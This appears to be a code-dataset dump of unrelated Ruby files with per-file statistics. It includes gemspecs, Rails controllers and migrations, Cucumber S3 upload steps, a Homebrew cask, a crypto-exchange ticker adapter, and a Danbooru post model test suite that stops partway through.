s.osx.deployment_target = '10.9'
s.tvos.deployment_target = '9.0'
s.watchos.deployment_target = '2.0'
s.source_files = 'Sources/Classes/**/*'
end
| 37.947368 | 97 | 0.662968 |
4aa474437ff1a61ffae220cc232d3c8d6f1b275e | 123 | class RemoveNsfFormFrom18fGsa < ActiveRecord::Migration
def change
remove_column :gsa18f_events, :nfs_form
end
end
| 20.5 | 55 | 0.796748 |
2662588e1bf8a7ddc4ef8a4407cfd39f1bd86071 | 45 | module Abuelo
VERSION = '0.1.0'.freeze
end
| 11.25 | 26 | 0.688889 |
286f2349efe816c7a16f6557d1765e15ffc957f7 | 2,820 | When(/^I upload a (\S+) file to \/(\S+)$/) do |size, uri|
FileGenerator.with_lorem_file(convert_size(size)) do |file|
S3Client[:source].s3_params = S3Manager.parse_s3_params(uri)
S3Client[:source].expected_size = file.size
S3Manager[:source].upload(file)
S3Client[:source].actual_size = S3Manager[:source].object_size
end
end
When(/^I upload a (\S+) file to \/(\S+) with curl$/) do |size, uri|
FileGenerator.with_lorem_file(convert_size(size)) do |file|
S3Client[:source].s3_params = S3Manager.parse_s3_params(uri)
S3Client[:source].expected_size = file.size
`curl -s -X POST -i http://localhost:10001/#{S3Client[:source].s3_params[0]} \
-F "Content-Type=multipart/form-data" \
-F "key=#{S3Client[:source].s3_params[1]}" \
-F "success_action_status=201" \
-F "file=@#{file.path}"`
S3Client[:source].actual_size = S3Manager[:source].object_size
end
end
When(/^I download a file from \/(\S+)$/) do |uri|
FileGenerator.with_empty_file do |file|
S3Client[:source].s3_params = S3Manager.parse_s3_params(uri)
S3Client[:source].expected_size = S3Manager[:source].object_size
S3Manager[:source].download(file)
S3Client[:source].file_exist = File.exist?(file.path)
S3Client[:source].actual_size = file.size
end
end
When(/^I copy an existing object to \/(\S+)$/) do |uri|
# src (Given clause)
S3Client[:destination].expected_size = S3Manager[:source].object_size
# dst (When clause)
S3Client[:destination].s3_params = S3Manager.parse_s3_params(uri)
S3Manager[:destination].copy(S3Client[:source].s3_params)
S3Client[:destination].actual_size = S3Manager[:destination].object_size
end
When(/^I remove several existing objects "(.+)" from bucket \/(\S+)$/) do |keys, bucket|
begin
S3Manager[:source].delete_objects(bucket, keys.split('|'))
rescue => e
S3Client[:source].error = e
end
end
Then(/^I can verify the success of the upload$/) do
expect(S3Manager[:source].object_exists?).to be true
end
Then(/^I can verify the success of the copy$/) do
expect(S3Manager[:source].object_exists?).to be true
expect(S3Manager[:destination].object_exists?).to be true
end
Then(/^I can verify the success of the download$/) do
expect(S3Client[:source].file_exist).to be true
end
Then(/^I can verify the size$/) do
S3Client.each_client do |id|
expect(S3Client[id].actual_size).to eq(S3Client[id].expected_size)
end
end
Then(/^I can verify the success of the deletion$/) do
expect(S3Client[:source].error).to be nil
end
Then(/^I remove the object\(s\) for the next test$/) do
S3Client.each_client do |id|
S3Manager[id].delete_object
end
S3Client.wipe
end
def convert_size(size)
case size
when 'tiny'
1
when 'large'
20
else
fail 'Invalid size parameter'
end
end
| 28.484848 | 88 | 0.698227 |
ac61054bb6a44b1e0ee4d446354e174aed7247dd | 756 | # -*- encoding: us-ascii -*-
module Rubinius
class Configuration
def initialize
end
private :initialize
def get_variable(name)
Rubinius.primitive :vm_get_config_item
raise PrimitiveFailure, "Rubinius::Configuration#get_variable primitive failed"
end
def get_section(section)
Rubinius.primitive :vm_get_config_section
raise PrimitiveFailure, "Rubinius::Configuration#get_section primitive failed"
end
def section(section)
ary = get_section(section)
i = 0
while i < ary.size
tup = ary[i]
yield tup[0], tup[1]
i += 1
end
end
def [](name)
get_variable(name)
end
alias_method :get, :[]
end
Config = Configuration.new
end
| 19.384615 | 85 | 0.642857 |
87edf9d19d8870a3b9b1f139807ab8826828ba29 | 1,320 | require_relative 'lib/nba_advanced_stats/version'
Gem::Specification.new do |spec|
spec.name = "nba_advanced_stats"
spec.version = NbaAdvancedStats::VERSION
spec.authors = ["jessegan"]
spec.email = ["[email protected]"]
spec.summary = "Find out advanced statistics about NBA teams and their performance during any NBA season from 1980 to 2019."
#spec.description = %q{TODO: Write a longer description or delete this line.}
spec.homepage = "https://github.com/jessegan/nba-advanded-stats"
spec.license = "MIT"
spec.required_ruby_version = Gem::Requirement.new(">= 2.3.0")
#spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "https://github.com/jessegan/nba-advanded-stats"
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
end
| 45.517241 | 132 | 0.675758 |
08c9e45a73f650f62c6c7a64f2f584c723e8d9f5 | 839 | module Astrails
module Safe
class Gpg < Pipe
def compressed?
active? || @parent.compressed?
end
protected
def pipe
if key
rise RuntimeError, "can't use both gpg password and pubkey" if password
"|gpg -e -r #{key}"
elsif password
"|gpg -c --passphrase-file #{gpg_password_file(password)}"
end
end
def extension
".gpg" if active?
end
def active?
password || key
end
def password
@password ||= config[:gpg, :password]
end
def key
@key ||= config[:gpg, :key]
end
def gpg_password_file(pass)
return "TEMP_GENERATED_FILENAME" if $DRY_RUN
Astrails::Safe::TmpFile.create("gpg-pass") { |file| file.write(pass) }
end
end
end
end
| 19.511628 | 81 | 0.544696 |
acc6317c5f80b52a63470ab0756b496f5f76977d | 1,352 | module Cryptoexchange::Exchanges
module Crytrex
module Services
class Market < Cryptoexchange::Services::Market
class << self
def supports_individual_ticker_query?
true
end
end
def fetch(market_pair)
output = super(ticker_url(market_pair))
return if output.length == 0
# return if empty hash
adapt(output['stats'], market_pair)
end
def ticker_url(market_pair)
"#{Cryptoexchange::Exchanges::Crytrex::Market::API_URL}/stats?market=#{market_pair.target}¤cy=#{market_pair.base}"
end
def adapt(output, market_pair)
ticker = Cryptoexchange::Models::Ticker.new
ticker.base = market_pair.base
ticker.target = market_pair.target
ticker.market = Crytrex::Market::NAME
ticker.last = NumericHelper.to_d(output['last_price'])
ticker.change = NumericHelper.to_d(output['daily_change_percent'])
ticker.ask = NumericHelper.to_d(output['ask'])
ticker.bid = NumericHelper.to_d(output['bid'])
ticker.volume = NumericHelper.to_d(output['24h_volume'])
ticker.timestamp = nil
ticker.payload = output
ticker
end
end
end
end
end
| 32.190476 | 130 | 0.593935 |
e9d25aa29022d94cb8023c7e010437e6b140a22b | 518 | cask 'bitwig-studio' do
version '3.1.2'
sha256 '3245d845dd47ae71df6f403ad29fe6c517963ef1f5d153ea8c179bccad7fae83'
url "https://downloads.bitwig.com/stable/#{version}/Bitwig%20Studio%20#{version}.dmg"
appcast 'https://www.bitwig.com/en/download.html'
name 'Bitwig Studio'
homepage 'https://www.bitwig.com/'
app 'Bitwig Studio.app'
zap trash: [
'~/Library/Application Support/Bitwig',
'~/Library/Caches/Bitwig',
'~/Library/Logs/Bitwig',
]
end
| 28.777778 | 87 | 0.65251 |
ed51f22b5519f5dbb7752ee63777d82e48a910d5 | 2,078 | class SuggestionsController < ApplicationController
protect_from_forgery except: :index
before_action :set_suggestion, only: [:show, :edit, :edit_request, :update, :report]
before_action :new_image_manager_filter, only: [:show, :edit, :update, :new]
def index
@title = params[:title]
@category = params[:category]
@status = params[:status]
@address = params[:address]
@distance = params[:distance]
@suggestions = Suggestion.search_filter(@title, @category, @status, @address, @distance)
.paginate(:page => params[:page], :per_page => 10)
respond_to do |format|
format.html
format.js
end
end
def show
end
def new
@suggestion = Suggestion.new
end
def create
suggestion_builder = SuggestionBuilder.new
@suggestion = suggestion_builder.create(suggestion_params, params[:image1_id], params[:image2_id])
render :new and return if @suggestion.has_errors?
flash[:info] = I18n.t('suggestions.create.flash_create_ok') if @suggestion.visible?
flash[:info] = I18n.t('suggestions.create.flash_email_info') if [email protected]?
redirect_to @suggestion
end
def report
CityCouncilResponsiblePerson.all.each do |responsible_person|
SuggestionMailer.report_suggestion(@suggestion, responsible_person).deliver_later
end
flash[:info] = t('.flash_report_ok')
redirect_to @suggestion
end
private
def update_image(image_param, image_id)
return image_id if image_param.nil?
if image_param.blank?
@image_manager.delete_image(image_id) if !image_id.nil?
return nil
end
@image_manager.delete_image(image_id) if !image_id.nil?
hash = @image_manager.upload_image(image_param)
return hash['public_id']
end
def set_suggestion
@suggestion = Suggestion.friendly.find(params[:id])
end
def new_image_manager_filter
@image_manager = ImageManagerFactory.create.new
end
def suggestion_params
params.require(:suggestion).permit(:title, :category, :author, :email, :comment, :latitude, :longitude)
end
end
| 27.706667 | 107 | 0.717517 |
e97c1e6597c6e79c5a2bfe9c3df65d05ee113c35 | 1,705 | # Copyright 2014, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
module Google
# Module Auth provides classes that provide Google-specific authorization
# used to access Google APIs.
module Auth
VERSION = "0.17.0".freeze
end
end
| 46.081081 | 75 | 0.777713 |
62a6fd10cf079df8cff310e7c2ef0670f15346cd | 754 | class AdminController < ApplicationController
include SessionHelper
def index
unless is_logged?
head 401
return
end
unless current_user.kind == 'admin'
head 403
return
end
render :index
end
def coaches
unless is_logged?
head 401
return
end
unless current_user.kind == 'admin'
head 403
return
end
@coaches = Coach.includes(:user).all
render :coaches
end
def remove
unless is_logged?
head 401
return
end
unless current_user.kind == 'admin'
head 403
return
end
coach = Coach.find_by_id params[:id]
user = User.find_by_id coach.user_id
user.destroy
redirect_to '/admin/coaches/'
end
end
| 15.08 | 45 | 0.616711 |
e8384e11c2e4621fe68f33f276db7dc76926e67a | 966 | require "logstash/namespace"
require "logstash/event"
require "logstash/plugin"
require "logstash/logging"
# This is the base class for logstash codecs.
module LogStash::Codecs; class Base < LogStash::Plugin
include LogStash::Config::Mixin
config_name "codec"
def initialize(params={})
super
config_init(params)
register if respond_to?(:register)
end
public
def decode(data)
raise "#{self.class}#decode must be overidden"
end # def decode
alias_method :<<, :decode
public
def encode(data)
raise "#{self.class}#encode must be overidden"
end # def encode
public
def teardown; end;
public
def on_event(&block)
@on_event = block
end
public
def flush(&block)
# does nothing by default.
# if your codec needs a flush method (like you are spooling things)
# you must implement this.
end
public
def clone
return self.class.new(@params)
end
end; end # class LogStash::Codecs::Base
| 19.714286 | 71 | 0.694617 |
b9eee50887628166a9dc8db1912bc5ef7036e1fb | 1,174 | desc 'Creates a csv with all winners from a season'
task export_winners: :environment do
file = "#{Rails.root}/tmp/prizes.csv"
winners = []
Season.where('season_number in (?)', [7, 8, 9]).each do |season|
season.divisions.each do |div|
if div.tier == 1
div.league_participants.each { |lp| winners << lp }
else
div.league_participants
.order(score: :desc, mov: :desc, id: :asc)
.limit(1).each { |lp| winners << lp }
end
end
end
CSV.open(file, 'w') do |csv|
csv << [
'user_id', 'lp id', 'Public Name', 'Div tier',
'Div Letter', 'Season Number', 'Full Name',
'Email', 'street 1', 'street 2', 'city',
'province/state', 'zip', 'country'
]
winners.each do |lp|
csv << [
lp&.user&.id, lp.id, lp.name, lp.division.tier, lp.division.letter,
lp.division.season.season_number, lp.user.name, lp.user.email,
lp&.user&.address&.first_line,
lp&.user&.address&.second_line, lp&.user&.address&.city,
lp&.user&.address&.county_province, lp&.user&.address&.zip_or_postcode,
lp&.user&.address&.country
]
end
end
end
| 30.102564 | 79 | 0.583475 |
91fb7ebb04d73109c9fb2ebce29011022a4bd3ae | 1,308 | # frozen_string_literal: true
require "spec_helper"
class Dummy
include(::KaminariApiMetaData)
end
describe KaminariApiMetaData do
describe "VERSION" do
let(:current_version) { File.read("VERSION").split("\n").first }
it "is set from the VERSION file" do
expect(::KaminariApiMetaData::VERSION).to eq(current_version)
end
end
describe "#meta_data(collection, extra_meta = {})" do
let(:dummy) { Dummy.new }
let(:kaminari_collection) do
OpenStruct.new(
current_page: 1,
next_page: 2,
limit_value: 20,
prev_page: nil,
total_pages: 10,
total_count: 23
)
end
describe "with no extra meta data" do
let(:expected) do
{ current_page: 1, next_page: 2, per_page: 20, prev_page: nil, total_pages: 10, total_count: 23 }
end
it "returns meta attributes" do
expect(dummy.meta_data(kaminari_collection)).to(eq(expected))
end
end
describe "with extra meta data" do
let(:expected) do
{ current_page: 1, next_page: 2, per_page: 20, prev_page: nil, total_pages: 10, total_count: 23, foo: "bar" }
end
it "returns meta attributes" do
expect(dummy.meta_data(kaminari_collection, foo: "bar")).to(eq(expected))
end
end
end
end
| 24.679245 | 117 | 0.639908 |
01eb275343083342e2609f1dbcdd627832d2ccb8 | 99,942 | require 'test_helper'
class PostTest < ActiveSupport::TestCase
def assert_tag_match(posts, query)
assert_equal(posts.map(&:id), Post.tag_match(query).pluck(:id))
end
def self.assert_invalid_tag(tag_name)
should "not allow '#{tag_name}' to be tagged" do
post = build(:post, tag_string: "touhou #{tag_name}")
assert(post.valid?)
assert_equal("touhou", post.tag_string)
assert_equal(1, post.warnings[:base].grep(/Couldn't add tag/).count)
end
end
def setup
super
travel_to(2.weeks.ago) do
@user = FactoryBot.create(:user)
end
CurrentUser.user = @user
CurrentUser.ip_addr = "127.0.0.1"
mock_pool_archive_service!
end
def teardown
super
CurrentUser.user = nil
CurrentUser.ip_addr = nil
end
context "Deletion:" do
context "Expunging a post" do
setup do
@upload = UploadService.new(FactoryBot.attributes_for(:jpg_upload)).start!
@post = @upload.post
Favorite.add(post: @post, user: @user)
create(:favorite_group, post_ids: [@post.id])
end
should "delete the files" do
assert_nothing_raised { @post.file(:preview) }
assert_nothing_raised { @post.file(:original) }
@post.expunge!
assert_raise(StandardError) { @post.file(:preview) }
assert_raise(StandardError) { @post.file(:original) }
end
should "remove all favorites" do
@post.expunge!
assert_equal(0, Favorite.for_user(@user.id).where("post_id = ?", @post.id).count)
end
should "remove all favgroups" do
assert_equal(1, FavoriteGroup.for_post(@post.id).count)
@post.expunge!
assert_equal(0, FavoriteGroup.for_post(@post.id).count)
end
should "decrement the uploader's upload count" do
assert_difference("@post.uploader.reload.post_upload_count", -1) do
@post.expunge!
end
end
should "decrement the user's note update count" do
FactoryBot.create(:note, post: @post)
assert_difference(["@post.uploader.reload.note_update_count"], -1) do
@post.expunge!
end
end
should "decrement the user's post update count" do
assert_difference(["@post.uploader.reload.post_update_count"], -1) do
@post.expunge!
end
end
should "decrement the user's favorite count" do
assert_difference(["@post.uploader.reload.favorite_count"], -1) do
@post.expunge!
end
end
should "remove the post from iqdb" do
mock_iqdb_service!
Post.iqdb_sqs_service.expects(:send_message).with("remove\n#{@post.id}")
@post.expunge!
end
context "that is status locked" do
setup do
@post.update(is_status_locked: true)
end
should "not destroy the record" do
@post.expunge!
assert_equal(1, Post.where("id = ?", @post.id).count)
end
end
context "that belongs to a pool" do
setup do
# must be a builder to update deleted pools. must be >1 week old to remove posts from pools.
CurrentUser.user = FactoryBot.create(:builder_user, created_at: 1.month.ago)
SqsService.any_instance.stubs(:send_message)
@pool = FactoryBot.create(:pool)
@pool.add!(@post)
@deleted_pool = FactoryBot.create(:pool)
@deleted_pool.add!(@post)
@deleted_pool.update_columns(is_deleted: true)
@post.expunge!
@pool.reload
@deleted_pool.reload
end
should "remove the post from all pools" do
assert_equal([], @pool.post_ids)
end
should "remove the post from deleted pools" do
assert_equal([], @deleted_pool.post_ids)
end
should "destroy the record" do
assert_equal([], @post.errors.full_messages)
assert_equal(0, Post.where("id = ?", @post.id).count)
end
end
end
context "Deleting a post" do
setup do
Danbooru.config.stubs(:blank_tag_search_fast_count).returns(nil)
end
context "that is status locked" do
setup do
@post = FactoryBot.create(:post, is_status_locked: true)
end
should "fail" do
@post.delete!("test")
assert_equal(["Is status locked ; cannot delete post"], @post.errors.full_messages)
assert_equal(1, Post.where("id = ?", @post.id).count)
end
end
context "that is pending" do
setup do
@post = FactoryBot.create(:post, is_pending: true)
end
should "succeed" do
@post.delete!("test")
assert_equal(true, @post.is_deleted)
assert_equal(1, @post.flags.size)
assert_match(/test/, @post.flags.last.reason)
end
end
context "with the banned_artist tag" do
should "also ban the post" do
post = FactoryBot.create(:post, :tag_string => "banned_artist")
post.delete!("test")
post.reload
assert(post.is_banned?)
end
end
context "that is still in cooldown after being flagged" do
should "succeed" do
post = FactoryBot.create(:post)
post.flag!("test flag")
post.delete!("test deletion")
assert_equal(true, post.is_deleted)
assert_equal(2, post.flags.size)
end
end
should "toggle the is_deleted flag" do
post = FactoryBot.create(:post)
assert_equal(false, post.is_deleted?)
post.delete!("test")
assert_equal(true, post.is_deleted?)
end
end
end
context "Parenting:" do
context "Assigning a parent to a post" do
should "update the has_children flag on the parent" do
p1 = FactoryBot.create(:post)
assert(!p1.has_children?, "Parent should not have any children")
c1 = FactoryBot.create(:post, :parent_id => p1.id)
p1.reload
assert(p1.has_children?, "Parent not updated after child was added")
end
should "update the has_children flag on the old parent" do
p1 = FactoryBot.create(:post)
p2 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.parent_id = p2.id
c1.save
p1.reload
p2.reload
assert(!p1.has_children?, "Old parent should not have a child")
assert(p2.has_children?, "New parent should have a child")
end
end
context "Expunging a post with" do
context "a parent" do
should "reset the has_children flag of the parent" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.expunge!
p1.reload
assert_equal(false, p1.has_children?)
end
should "reassign favorites to the parent" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
user = FactoryBot.create(:user)
c1.add_favorite!(user)
c1.expunge!
p1.reload
assert(!Favorite.exists?(:post_id => c1.id, :user_id => user.id))
assert(Favorite.exists?(:post_id => p1.id, :user_id => user.id))
assert_equal(0, c1.score)
end
should "update the parent's has_children flag" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.expunge!
p1.reload
assert(!p1.has_children?, "Parent should not have children")
end
end
context "one child" do
should "remove the parent of that child" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
p1.expunge!
c1.reload
assert_nil(c1.parent)
end
end
context "two or more children" do
setup do
# ensure initial post versions won't be merged.
travel_to(1.day.ago) do
@p1 = FactoryBot.create(:post)
@c1 = FactoryBot.create(:post, :parent_id => @p1.id)
@c2 = FactoryBot.create(:post, :parent_id => @p1.id)
@c3 = FactoryBot.create(:post, :parent_id => @p1.id)
end
end
should "reparent all children to the first child" do
@p1.expunge!
@c1.reload
@c2.reload
@c3.reload
assert_nil(@c1.parent_id)
assert_equal(@c1.id, @c2.parent_id)
assert_equal(@c1.id, @c3.parent_id)
end
should "save a post version record for each child" do
assert_difference(["@c1.versions.count", "@c2.versions.count", "@c3.versions.count"]) do
@p1.expunge!
@c1.reload
@c2.reload
@c3.reload
end
end
should "set the has_children flag on the new parent" do
@p1.expunge!
assert_equal(true, @c1.reload.has_children?)
end
end
end
context "Deleting a post with" do
context "a parent" do
should "not reassign favorites to the parent by default" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
user = FactoryBot.create(:gold_user)
c1.add_favorite!(user)
c1.delete!("test")
p1.reload
assert(Favorite.exists?(:post_id => c1.id, :user_id => user.id))
assert(!Favorite.exists?(:post_id => p1.id, :user_id => user.id))
end
should "reassign favorites to the parent if specified" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
user = FactoryBot.create(:gold_user)
c1.add_favorite!(user)
c1.delete!("test", :move_favorites => true)
p1.reload
assert(!Favorite.exists?(:post_id => c1.id, :user_id => user.id), "Child should not still have favorites")
assert(Favorite.exists?(:post_id => p1.id, :user_id => user.id), "Parent should have favorites")
end
should "not update the parent's has_children flag" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.delete!("test")
p1.reload
assert(p1.has_children?, "Parent should have children")
end
should "clear the has_active_children flag when the 'move favorites' option is set" do
user = FactoryBot.create(:gold_user)
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.add_favorite!(user)
assert_equal(true, p1.reload.has_active_children?)
c1.delete!("test", :move_favorites => true)
assert_equal(false, p1.reload.has_active_children?)
end
end
context "one child" do
should "not remove the has_children flag" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
p1.delete!("test")
p1.reload
assert_equal(true, p1.has_children?)
end
should "not remove the parent of that child" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
p1.delete!("test")
c1.reload
assert_not_nil(c1.parent)
end
end
context "two or more children" do
should "not reparent all children to the first child" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c2 = FactoryBot.create(:post, :parent_id => p1.id)
c3 = FactoryBot.create(:post, :parent_id => p1.id)
p1.delete!("test")
c1.reload
c2.reload
c3.reload
assert_equal(p1.id, c1.parent_id)
assert_equal(p1.id, c2.parent_id)
assert_equal(p1.id, c3.parent_id)
end
end
end
context "Undeleting a post with a parent" do
should "update with a new approver" do
new_user = FactoryBot.create(:moderator_user)
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.delete!("test")
c1.approve!(new_user)
p1.reload
assert_equal(new_user.id, c1.approver_id)
end
should "preserve the parent's has_children flag" do
p1 = FactoryBot.create(:post)
c1 = FactoryBot.create(:post, :parent_id => p1.id)
c1.delete!("test")
c1.approve!
p1.reload
assert_not_nil(c1.parent_id)
assert(p1.has_children?, "Parent should have children")
end
end
end
context "Moderation:" do
context "A deleted post" do
setup do
@post = FactoryBot.create(:post, :is_deleted => true)
end
context "that is status locked" do
setup do
@post.update(is_status_locked: true)
end
should "not allow undeletion" do
approval = @post.approve!
assert_equal(["Post is locked and cannot be approved"], approval.errors.full_messages)
assert_equal(true, @post.is_deleted?)
end
end
context "that is undeleted" do
setup do
@mod = FactoryBot.create(:moderator_user)
CurrentUser.user = @mod
end
context "by the approver" do
setup do
@post.update_attribute(:approver_id, @mod.id)
end
should "not be permitted" do
approval = @post.approve!
assert_equal(false, approval.valid?)
assert_equal(["You have previously approved this post and cannot approve it again"], approval.errors.full_messages)
end
end
context "by the uploader" do
setup do
@post.update_attribute(:uploader_id, @mod.id)
end
should "not be permitted" do
approval = @post.approve!
assert_equal(false, approval.valid?)
assert_equal(["You cannot approve a post you uploaded"], approval.errors.full_messages)
end
end
end
context "when undeleted" do
should "be undeleted" do
@post.approve!
assert_equal(false, @post.reload.is_deleted?)
end
should "create a mod action" do
@post.approve!
assert_equal("undeleted post ##{@post.id}", ModAction.last.description)
assert_equal("post_undelete", ModAction.last.category)
end
end
context "when approved" do
should "be undeleted" do
@post.approve!
assert_equal(false, @post.reload.is_deleted?)
end
should "create a mod action" do
@post.approve!
assert_equal("undeleted post ##{@post.id}", ModAction.last.description)
assert_equal("post_undelete", ModAction.last.category)
end
end
should "be appealed" do
create(:post_appeal, post: @post)
assert(@post.is_deleted?, "Post should still be deleted")
assert_equal(1, @post.appeals.count)
end
end
context "An approved post" do
should "be flagged" do
post = FactoryBot.create(:post)
assert_difference("PostFlag.count", 1) do
post.flag!("bad")
end
assert(post.is_flagged?, "Post should be flagged.")
assert_equal(1, post.flags.count)
end
should "not be flagged if no reason is given" do
post = FactoryBot.create(:post)
assert_difference("PostFlag.count", 0) do
assert_raises(PostFlag::Error) do
post.flag!("")
end
end
end
end
context "An unapproved post" do
should "preserve the approver's identity when approved" do
post = FactoryBot.create(:post, :is_pending => true)
post.approve!
assert_equal(post.approver_id, CurrentUser.id)
end
context "that was previously approved by person X" do
setup do
@user = FactoryBot.create(:moderator_user, :name => "xxx")
@user2 = FactoryBot.create(:moderator_user, :name => "yyy")
@post = FactoryBot.create(:post, :approver_id => @user.id)
@post.flag!("bad")
end
should "not allow person X to reapprove that post" do
approval = @post.approve!(@user)
assert_includes(approval.errors.full_messages, "You have previously approved this post and cannot approve it again")
end
should "allow person Y to approve the post" do
@post.approve!(@user2)
assert(@post.valid?)
end
end
context "that has been reapproved" do
should "no longer be flagged or pending" do
post = FactoryBot.create(:post)
post.flag!("bad")
post.approve!
assert(post.errors.empty?, post.errors.full_messages.join(", "))
post.reload
assert_equal(false, post.is_flagged?)
assert_equal(false, post.is_pending?)
end
end
end
# A status-locked post rejects all status changes: flags, appeals, and approval.
context "A status locked post" do
  setup do
    @post = FactoryBot.create(:post, is_status_locked: true)
  end

  should "not allow new flags" do
    assert_raises(PostFlag::Error) do
      @post.flag!("wrong")
    end
  end

  should "not allow new appeals" do
    # The appeal is invalid; per its error message the post counts as active.
    @appeal = build(:post_appeal, post: @post)
    assert_equal(false, @appeal.valid?)
    assert_equal(["Post is active"], @appeal.errors.full_messages)
  end

  should "not allow approval" do
    approval = @post.approve!
    assert_includes(approval.errors.full_messages, "Post is locked and cannot be approved")
  end
end
end
context "Tagging:" do
context "A post" do
setup do
@post = FactoryBot.create(:post)
end
context "as a new user" do
setup do
@post.update(:tag_string => "aaa bbb ccc ddd tagme")
CurrentUser.user = FactoryBot.create(:user)
end
should "not allow you to remove tags" do
@post.update(tag_string: "aaa")
assert_equal(["You must have an account at least 1 week old to remove tags"], @post.errors.full_messages)
end
should "allow you to remove request tags" do
@post.update(tag_string: "aaa bbb ccc ddd")
@post.reload
assert_equal("aaa bbb ccc ddd", @post.tag_string)
end
end
context "with a banned artist" do
setup do
CurrentUser.scoped(FactoryBot.create(:admin_user)) do
@artist = FactoryBot.create(:artist)
@artist.ban!
end
@post = FactoryBot.create(:post, :tag_string => @artist.name)
end
should "ban the post" do
assert_equal(true, @post.is_banned?)
end
end
context "with an artist tag that is then changed to copyright" do
  setup do
    CurrentUser.user = FactoryBot.create(:builder_user)
    # Re-fetch between updates so each edit starts from persisted state.
    @post = Post.find(@post.id)
    @post.update(:tag_string => "art:abc")
    @post = Post.find(@post.id)
    @post.update(:tag_string => "copy:abc")
    @post.reload
  end

  should "update the category of the tag" do
    assert_equal(Tag.categories.copyright, Tag.find_by_name("abc").category)
  end

  # Test name fixed: removed stray "1234 " debug prefix.
  should "update the category cache of the tag" do
    assert_equal(Tag.categories.copyright, Cache.get("tc:#{Cache.hash('abc')}"))
  end

  should "update the tag counts of the posts" do
    assert_equal(0, @post.tag_count_artist)
    assert_equal(1, @post.tag_count_copyright)
    assert_equal(0, @post.tag_count_general)
  end
end
context "using a tag prefix on an aliased tag" do
setup do
FactoryBot.create(:tag_alias, :antecedent_name => "abc", :consequent_name => "xyz")
@post = Post.find(@post.id)
@post.update(:tag_string => "art:abc")
@post.reload
end
should "convert the tag to its normalized version" do
assert_equal("xyz", @post.tag_string)
end
end
context "tagged with a valid tag" do
subject { @post }
should allow_value("touhou 100%").for(:tag_string)
should allow_value("touhou FOO").for(:tag_string)
should allow_value("touhou -foo").for(:tag_string)
should allow_value("touhou pool:foo").for(:tag_string)
should allow_value("touhou -pool:foo").for(:tag_string)
should allow_value("touhou newpool:foo").for(:tag_string)
should allow_value("touhou fav:self").for(:tag_string)
should allow_value("touhou -fav:self").for(:tag_string)
should allow_value("touhou upvote:self").for(:tag_string)
should allow_value("touhou downvote:self").for(:tag_string)
should allow_value("touhou parent:1").for(:tag_string)
should allow_value("touhou child:1").for(:tag_string)
should allow_value("touhou source:foo").for(:tag_string)
should allow_value("touhou rating:z").for(:tag_string)
should allow_value("touhou locked:rating").for(:tag_string)
should allow_value("touhou -locked:rating").for(:tag_string)
# \u3000 = ideographic space, \u00A0 = no-break space
should allow_value("touhou\u3000foo").for(:tag_string)
should allow_value("touhou\u00A0foo").for(:tag_string)
end
context "tagged with an invalid tag" do
context "that doesn't already exist" do
assert_invalid_tag("user:evazion")
assert_invalid_tag("*~foo")
assert_invalid_tag("*-foo")
assert_invalid_tag(",-foo")
assert_invalid_tag("___")
assert_invalid_tag("~foo")
assert_invalid_tag("_foo")
assert_invalid_tag("foo_")
assert_invalid_tag("foo__bar")
assert_invalid_tag("foo*bar")
assert_invalid_tag("foo,bar")
assert_invalid_tag("foo\abar")
assert_invalid_tag("café")
assert_invalid_tag("東方")
end
context "that already exists" do
setup do
